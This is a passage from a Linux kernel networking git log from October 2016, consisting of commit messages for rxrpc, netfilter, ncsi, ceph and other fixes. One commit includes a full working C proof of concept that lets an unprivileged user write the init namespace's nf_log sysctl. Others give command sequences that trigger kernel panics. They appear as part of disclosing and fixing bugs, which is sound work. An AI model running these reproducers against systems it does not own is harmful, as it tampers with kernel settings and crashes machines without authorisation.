     (c) A negative error code must thence be returned to the kernel
     	 service so that it knows the call died.

     (d) The AFS filesystem must detect the fatal error and end the call.

 (7) Must produce a DELAY ACK when the actual service operation takes a
     while to process and must cancel the ACK when the reply is ready.

 (8) Don't request an ACK on the last DATA packet of the Tx phase as this
     confuses OpenAFS.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 21:04:24 -04:00
Eric Dumazet
d35c99ff77 netlink: do not enter direct reclaim from netlink_dump()
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.

Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.

The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.

On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT

While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.

iproute2 already uses 32KB recvmsg() buffer sizes.

Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)

Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:53:13 -04:00
Anoob Soman
6664498280 packet: call fanout_release, while UNREGISTERING a netdev
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:50:18 -04:00
Linus Torvalds
14986a34e1 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace
Pull namespace updates from Eric Biederman:
 "This set of changes is a number of smaller things that have been
  overlooked in other development cycles focused on more fundamental
  change. The devpts changes are small things that were a distraction
  until we managed to kill off DEVPTS_MULTPLE_INSTANCES. There is an
  trivial regression fix to autofs for the unprivileged mount changes
  that went in last cycle. A pair of ioctls has been added by Andrey
  Vagin making it is possible to discover the relationships between
  namespaces when referring to them through file descriptors.

  The big user visible change is starting to add simple resource limits
  to catch programs that misbehave. With namespaces in general and user
  namespaces in particular allowing users to use more kinds of
  resources, it has become important to have something to limit errant
  programs. Because the purpose of these limits is to catch errant
  programs the code needs to be inexpensive to use as it always on, and
  the default limits need to be high enough that well behaved programs
  on well behaved systems don't encounter them.

  To this end, after some review I have implemented per user per user
  namespace limits, and use them to limit the number of namespaces. The
  limits being per user mean that one user can not exhause the limits of
  another user. The limits being per user namespace allow contexts where
  the limit is 0 and security conscious folks can remove from their
  threat anlysis the code used to manage namespaces (as they have
  historically done as it root only). At the same time the limits being
  per user namespace allow other parts of the system to use namespaces.

  Namespaces are increasingly being used in application sand boxing
  scenarios so an all or nothing disable for the entire system for the
  security conscious folks makes increasing use of these sandboxes
  impossible.

  There is also added a limit on the maximum number of mounts present in
  a single mount namespace. It is nontrivial to guess what a reasonable
  system wide limit on the number of mount structure in the kernel would
  be, especially as it various based on how a system is using
  containers. A limit on the number of mounts in a mount namespace
  however is much easier to understand and set. In most cases in
  practice only about 1000 mounts are used. Given that some autofs
  scenarious have the potential to be 30,000 to 50,000 mounts I have set
  the default limit for the number of mounts at 100,000 which is well
  above every known set of users but low enough that the mount hash
  tables don't degrade unreaonsably.

  These limits are a start. I expect this estabilishes a pattern that
  other limits for resources that namespaces use will follow. There has
  been interest in making inotify event limits per user per user
  namespace as well as interest expressed in making details about what
  is going on in the kernel more visible"

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace: (28 commits)
  autofs:  Fix automounts by using current_real_cred()->uid
  mnt: Add a per mount namespace limit on the number of mounts
  netns: move {inc,dec}_net_namespaces into #ifdef
  nsfs: Simplify __ns_get_path
  tools/testing: add a test to check nsfs ioctl-s
  nsfs: add ioctl to get a parent namespace
  nsfs: add ioctl to get an owning user namespace for ns file descriptor
  kernel: add a helper to get an owning user namespace for a namespace
  devpts: Change the owner of /dev/pts/ptmx to the mounter of /dev/pts
  devpts: Remove sync_filesystems
  devpts: Make devpts_kill_sb safe if fsi is NULL
  devpts: Simplify devpts_mount by using mount_nodev
  devpts: Move the creation of /dev/pts/ptmx into fill_super
  devpts: Move parse_mount_options into fill_super
  userns: When the per user per user namespace limit is reached return ENOSPC
  userns; Document per user per user namespace limits.
  mntns: Add a limit on the number of mount namespaces.
  netns: Add a limit on the number of net namespaces
  cgroupns: Add a limit on the number of cgroup namespaces
  ipcns: Add a  limit on the number of ipc namespaces
  ...
2016-10-06 09:52:23 -07:00
Michał Narajowski
1b42206665 Bluetooth: Refactor append name and appearance
Use eir_append_data to remove code duplication.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
Michał Narajowski
7ddb30c747 Bluetooth: Add appearance to default scan rsp data
Add appearance value to beginning of scan rsp data for
default advertising instance if the value is not 0.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
Michał Narajowski
cecbf3e932 Bluetooth: Fix local name in scan rsp
Use complete name if it fits. If not and there is short name
check if it fits. If not then use shortened name as prefix
of complete name.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-06 11:52:29 +02:00
David Howells
bf7d620abf rxrpc: Don't request an ACK on the last DATA packet of a call's Tx phase
Don't request an ACK on the last DATA packet of a call's Tx phase as for a
client there will be a reply packet or some sort of ACK to shift phase.  If
the ACK is requested, OpenAFS sends a REQUESTED-ACK ACK with soft-ACKs in
it and doesn't follow up with a hard-ACK.

If we don't set the flag, OpenAFS will send a DELAY ACK that hard-ACKs the
reply data, thereby allowing the call to terminate cleanly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:51 +01:00
David Howells
9749fd2bea rxrpc: Need to produce an ACK for service op if op takes a long time
We need to generate a DELAY ACK from the service end of an operation if we
start doing the actual operation work and it takes longer than expected.
This will hard-ACK the request data and allow the client to release its
resources.

To make this work:

 (1) We have to set the ack timer and propose an ACK when the call moves to
     the RXRPC_CALL_SERVER_ACK_REQUEST and clear the pending ACK and cancel
     the timer when we start transmitting the reply (the first DATA packet
     of the reply implicitly ACKs the request phase).

 (2) It must be possible to set the timer when the caller is holding
     call->state_lock, so split the lock-getting part of the timer function
     out.

 (3) Add trace notes for the ACK we're requesting and the timer we clear.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
cf69207afa rxrpc: Return negative error code to kernel service
In rxrpc_kernel_recv_data(), when we return the error number incurred by a
failed call, we must negate it before returning it as it's stored as
positive (that's what we have to pass back to userspace).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
94bc669efa rxrpc: Add missing notification
The call's background processor work item needs to notify the socket when
it completes a call so that recvmsg() or the AFS fs can deal with it.
Without this, call expiry isn't handled.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
d7833d0091 rxrpc: Queue the call on expiry
When a call expires, it must be queued for the background processor to deal
with otherwise a service call that is improperly terminated will just sit
there awaiting an ACK and won't expire.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
b3156274ca rxrpc: Partially handle OpenAFS's improper termination of calls
OpenAFS doesn't always correctly terminate client calls that it makes -
this includes calls the OpenAFS servers make to the cache manager service.
It should end the client call with either:

 (1) An ACK that has firstPacket set to one greater than the seq number of
     the reply DATA packet with the LAST_PACKET flag set (thereby
     hard-ACK'ing all packets).  nAcks should be 0 and acks[] should be
     empty (ie. no soft-ACKs).

 (2) An ACKALL packet.

OpenAFS, though, may send an ACK packet with firstPacket set to the last
seq number or less and soft-ACKs listed for all packets up to and including
the last DATA packet.

The transmitter, however, is obliged to keep the call live and the
soft-ACK'd DATA packets around until they're hard-ACK'd as the receiver is
permitted to drop any merely soft-ACK'd packet and request retransmission
by sending an ACK packet with a NACK in it.

Further, OpenAFS will also terminate a client call by beginning the next
client call on the same connection channel.  This implicitly completes the
previous call.

This patch handles implicit ACK of a call on a channel by the reception of
the first packet of the next call on that channel.

If another call doesn't come along to implicitly ACK a call, then we have
to time the call out.  There are some bugs there that will be addressed in
subsequent patches.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a5af7e1fc6 rxrpc: Fix loss of PING RESPONSE ACK production due to PING ACKs
Separate the output of PING ACKs from the output of other sorts of ACK so
that if we receive a PING ACK and schedule transmission of a PING RESPONSE
ACK, the response doesn't get cancelled by a PING ACK we happen to be
scheduling transmission of at the same time.

If a PING RESPONSE gets lost, the other side might just sit there waiting
for it and refuse to proceed otherwise.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
26cb02aa6d rxrpc: Fix warning by splitting rxrpc_send_call_packet()
Split rxrpc_send_data_packet() to separate ACK generation (which is more
complicated) from ABORT generation.  This simplifies the code a bit and
fixes the following warning:

In file included from ../net/rxrpc/output.c:20:0:
net/rxrpc/output.c: In function 'rxrpc_send_call_packet':
net/rxrpc/ar-internal.h:1187:27: error: 'top' may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/rxrpc/output.c:103:24: note: 'top' was declared here
net/rxrpc/output.c:225:25: error: 'hard_ack' may be used uninitialized in this function [-Werror=maybe-uninitialized]

Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a9f312d98a rxrpc: Only ping for lost reply in client call
When a reply is deemed lost, we send a ping to find out the other end
received all the request data packets we sent.  This should be limited to
client calls and we shouldn't do this on service calls.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
7212a57e8e rxrpc: Fix oops on incoming call to serviceless endpoint
If an call comes in to a local endpoint that isn't listening for any
incoming calls at the moment, an oops will happen.  We need to check that
the local endpoint's service pointer isn't NULL before we dereference it.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
19c0dbd540 rxrpc: Fix duplicate const
Remove a duplicate const keyword.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David Howells
b63452c11e rxrpc: Accesses of rxrpc_local::service need to be RCU managed
struct rxrpc_local->service is marked __rcu - this means that accesses of
it need to be managed using RCU wrappers.  There are two such places in
rxrpc_release_sock() where the value is checked and cleared.  Fix this by
using the appropriate wrappers.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David S. Miller
5bfb88a163 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next
Pablo Neira Ayuso says:

====================
Netfilter fixes for net-next

This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:

1) Address a potential null dereference in nf_unregister_net_hook()
   when becomes nf_hook_entry_head is NULL, from Aaron Conole.

2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.

3) Fix linking problems in xt_hashlimit in x86_32, from Pai.

4) Fix permissions of nf_log sysctl from unpriviledge netns, from
   Jann Horn.

5) Fix possible divide by zero in nft_limit, from Liping Zhang.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-05 20:15:55 -04:00
Ilya Dryomov
64f77566e1 crush: remove redundant local variable
Remove extra x1 variable, it's just temporary placeholder that
clutters the code unnecessarily.

Reflects ceph.git commit 0d19408d91dd747340d70287b4ef9efd89e95c6b.

Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-05 23:02:10 +02:00
Ilya Dryomov
74a5293832 crush: don't normalize input of crush_ln iteratively
Use __builtin_clz() supported by GCC and Clang to figure out
how many bits we should shift instead of shifting by a bit
in a loop until the value gets normalized. Improves performance
of this function by up to 3x in worst-case scenario and overall
straw2 performance by ~10%.

Reflects ceph.git commit 110de33ca497d94fc4737e5154d3fe781fa84a0a.

Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-05 23:02:04 +02:00
Johannes Berg
1e1430d528 Merge remote-tracking branch 'net-next/master' into mac80211-next
Resolve the merge conflict between Felix's/my and Toke's patches
coming into the tree through net and mac80211-next respectively.
Most of Felix's changes go away due to Toke's new infrastructure
work, my patch changes to "goto begin" (the label wasn't there
before) instead of returning NULL so flow control towards drivers
is preserved better.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-04 09:46:44 +02:00
Liping Zhang
2fa46c1301 netfilter: nft_limit: fix divided by zero panic
After I input the following nftables rule, a panic happened on my system:
  # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second

  divide error: 0000 [#1] SMP
  [ ... ]
  RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
  nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
  Call Trace:
  [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
  [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
  [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
  [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
  [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
  [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
  [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
  [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
  [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
  [<ffffffff81703d3c>] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf00000000 becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:59:03 +02:00
Jann Horn
dbb5918cb3 netfilter: fix namespace handling in nf_log_proc_dostring
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:41:06 +02:00
Gavin Shan
c0cd1ba4f8 net/ncsi: Introduce ncsi_stop_dev()
This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
to stop the NCSI device so that it can be reenabled in future. This
API should be called when the network device driver is going to
shutdown the device. There are 3 things done in the function: Stop
the channel monitoring; Reset channels to inactive state; Report
NCSI link down.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
83afdc6aad net/ncsi: Rework the channel monitoring
The original NCSI channel monitoring was implemented based on a
backoff algorithm: the GLS response should be received in the
specified interval. Otherwise, the channel is regarded as dead
and failover should be taken if current channel is an active one.
There are several problems in the implementation: (A) On BCM5718,
we found when the IID (Instance ID) in the GLS command packet
changes from 255 to 1, the response corresponding to IID#1 never
comes in. It means we cannot make the unfair judgement that the
channel is dead when one response is missed. (B) The code's
readability should be improved. (C) We should do failover when
current channel is active one and the channel monitoring should
be marked as disabled before doing failover.

This reworks the channel monitoring to address all above issues.
The fields for channel monitoring is put into separate struct
and the state of channel monitoring is predefined. The channel
is regarded alive if the network controller responses to one of
two GLS commands or both of them in 5 seconds.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
a0509cbeef net/ncsi: Allow to extend NCSI request properties
There is only one NCSI request property for now: the response for
the sent command need drive the workqueue or not. So we had one
field (@driven) for the purpose. We lost the flexibility to extend
NCSI request properties.

This replaces @driven with @flags and @req_flags in NCSI request
and NCSI command argument struct. Each bit of the newly introduced
field can be used for one property. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
a15af54f8f net/ncsi: Rework request index allocation
The NCSI request index (struct ncsi_request::id) is put into instance
ID (IID) field while sending NCSI command packet. It was designed the
available IDs are given in round-robin fashion. @ndp->request_id was
introduced to represent the next available ID, but it has been used
as number of successively allocated IDs. It breaks the round-robin
design. Besides, we shouldn't put 0 to NCSI command packet's IID
field, meaning ID#0 should be reserved according section 6.3.1.1
in NCSI spec (v1.1.0).

This fixes above two issues. With it applied, the available IDs will
be assigned in round-robin fashion and ID#0 won't be assigned.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
55e02d0837 net/ncsi: Don't probe on the reserved channel ID (0x1f)
We needn't send CIS (Clear Initial State) command to the NCSI
reserved channel (0x1f) in the enumeration. We shouldn't receive
a valid response from CIS on NCSI channel 0x1f.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
bc7e0f50aa net/ncsi: Introduce NCSI_RESERVED_CHANNEL
This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
ID (0x1f). No logical changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
d8cedaabe7 net/ncsi: Avoid unused-value build warning from ia64-linux-gcc
xchg() is used to set NCSI channel's state in order for consistent
access to the state. xchg()'s return value should be used. Otherwise,
one build warning will be raised (with -Wunused-value) as below message
indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.

 net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
 arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
 not used [-Wunused-value]
  ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
   ^
 net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
  xchg(&nc->state, NCSI_CHANNEL_INACTIVE);

This removes the atomic access to NCSI channel's state avoid the above
build warning. We have to hold the channel's lock when its state is readed
or updated. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Andrew Collins
93409033ae net: Add netdev all_adj_list refcnt propagation to fix panic
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.

The following sequence of commands will reproduce the issue:

ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr

This creates an upper/lower tree of (excuse the poor ASCII art):

            /---eth0.100-eth0
mac0-testbr-
            \---eth0.200-eth0

When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.

This change adds reference count propagation so things are handled properly.

Matthias Schiffer reported a similar crash in batman-adv:

https://github.com/freifunk-gluon/gluon/issues/680
https://www.open-mesh.org/issues/247

which this patch also seems to resolve.

Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:05:31 -04:00
Shmulik Ladkani
b6a7920848 net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header
skb_vlan_pop/push were too generic, trying to support the cases where
skb->data is at mac header, and cases where skb->data is arbitrarily
elsewhere.

Supporting an arbitrary skb->data was complex and bogus:
 - It failed to unwind skb->data to its original location post actual
   pop/push.
   (Also, semantic is not well defined for unwinding: If data was into
    the eth header, need to use same offset from start; But if data was
    at network header or beyond, need to adjust the original offset
    according to the push/pull)
 - It mangled the rcsum post actual push/pop, without taking into account
   that the eth bytes might already have been pulled out of the csum.

Most callers (ovs, bpf) already had their skb->data at mac_header upon
invoking skb_vlan_pop/push.
Last caller that failed to do so (act_vlan) has been recently fixed.

Therefore, to simplify things, no longer support arbitrary skb->data
inputs for skb_vlan_pop/push().

skb->data is expected to be exactly at mac_header; WARN otherwise.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:41:40 -04:00
Shmulik Ladkani
f39acc84aa net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() functions
Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
case where the input skb data pointer does not point at the mac header:

- They're doing push/pop, but fail to properly unwind data back to its
  original location.
  For example, in the skb_vlan_push case, any subsequent
  'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
  BEFORE start of frame, leading to bogus frames that may be transmitted.

- They update rcsum per the added/removed 4 bytes tag.
  Alas if data is originally after the vlan/eth headers, then these
  bytes were already pulled out of the csum.

OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
present no issues.

act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
at network header (upon ingress).
Other calles (ovs, bpf) already adjust skb->data at mac_header.

This patch fixes act_vlan to point to the mac_header prior calling
skb_vlan_*() functions, as other callers do.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:40:50 -04:00
Al Viro
25869262ef skb_splice_bits(): get rid of callback
since pipe_lock is the outermost now, we don't need to drop/regain
socket locks around the call of splice_to_pipe() from skb_splice_bits(),
which kills the need to have a socket-specific callback; we can just
call splice_to_pipe() and be done with that.

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-03 20:40:56 -04:00
Ilya Dryomov
464691bd52 libceph: ceph_build_auth() doesn't need ceph_auth_build_hello()
A static bug finder (EBA) on Linux 4.7:

    Double lock in net/ceph/auth.c
    second lock at 108: mutex_lock(& ac->mutex); [ceph_auth_build_hello]
    after calling from 263: ret = ceph_auth_build_hello(ac, msg_buf, msg_len);
    if ! ac->protocol -> true at 262
    first lock at 261: mutex_lock(& ac->mutex); [ceph_build_auth]

ceph_auth_build_hello() is never called, because the protocol is always
initialized, whether we are checking existing tickets (in delayed_work())
or getting new ones after invalidation (in invalidate_authorizer()).

Reported-by: Iago Abal <iari@itu.dk>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-03 16:13:50 +02:00
Ilya Dryomov
fdc723e77b libceph: use CEPH_AUTH_UNKNOWN in ceph_auth_build_hello()
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
2016-10-03 16:13:50 +02:00
David S. Miller
7667d445fa RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+7Zg/Sw1s6N8H32AQIprA//ewnCeNT3m53au7molP/KWgqkTUJYXjW0
 tdUjebDGB50UyFVj+f/oHowu4ylYg6DiCjkfidr7Mc1ngnzJjgZUGOIq4OACFa5H
 lVfUM9okpSKWz61/ljq0Li70j4HscFVC3efXyfF25vTeCpqKSxtqNypwOB4KE5fu
 hv2a5IxBJnY4XVKNhC94NiqZ7SFmtb6RPk/M8Tm9rB0C4haq3WGH2Fp5iobcs3+F
 8u+UPOPZ+n2UAWMCxg8os4iDi2Uec0sQRPVZZbbTQN2uwzjZS1Jqx/Wf5Fbz0C9x
 mV7N9HtKEznt7HTo0pUN6B1kEE3GbkFnCDUTASclg5CkN0G1ptB3QdFv22UCyoNK
 9DvfUUWR+TGnLlrwyzaxBCcg1Cz2YgPahoowMD5iTA8IpLbB51beyeL09N6w+iPO
 BpqYd31y3ie3qH3FYYJdsAxCtYvRvABme+D3GHvlbleVMBRqbNAxt0JZxghK4IfX
 P4qw+L6ylNZTDO10bgZpJyGDe9kvxy/kuHiid7jYTuRdyHwt2RoRJGKMAQinDDpV
 XJHfMXQKbSIoCfMNN7aWv08BMxIrXmkwDQAdf2XVcy9sGy1yDnMCxdKqcXNX19ax
 Co86ZHz9t8kJ/Um3v1wEo77T2/JP4CuqvbN/nMcU3Ll/u2tPyDXzqs7xWkdSdV7W
 GC4AdqT3LAo=
 =dmH+
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160930' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: More fixes and adjustments

This set of patches contains some more fixes and adjustments:

 (1) Actually display the retransmission indication previously added to the
     tx_data trace.

 (2) Switch to Congestion Avoidance mode properly at cwnd==ssthresh rather
     than relying on detection during an overshoot and correction.

 (3) Reduce ssthresh to the peer's declared receive window.

 (4) The offset field in rxrpc_skb_priv can be dispensed with and the error
     field is no longer used.  Get rid of them.

 (5) Keep the call timeouts as ktimes rather than jiffies to make it easier
     to deal with RTT-based timeout values in future.  Rounding to jiffies
     is still necessary when the system timer is set.

 (6) Fix the call timer handling to avoid retriggering of expired timeout
     actions.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:02:17 -04:00
Jiri Benc
85de4a2101 openvswitch: use mpls_hdr
skb_mpls_header is equivalent to mpls_hdr now. Use the existing helper
instead.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:22 -04:00
Jiri Benc
9095e10edd mpls: move mpls_hdr to a common location
This will be also used by openvswitch.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
Jiri Benc
f7d49bce8e openvswitch: mpls: set network header correctly on key extract
After the 48d2ab609b ("net: mpls: Fixups for GSO"), MPLS handling in
openvswitch was changed to have network header pointing to the start of the
MPLS headers and inner_network_header pointing after the MPLS headers.

However, key_extract was missed by the mentioned commit, causing incorrect
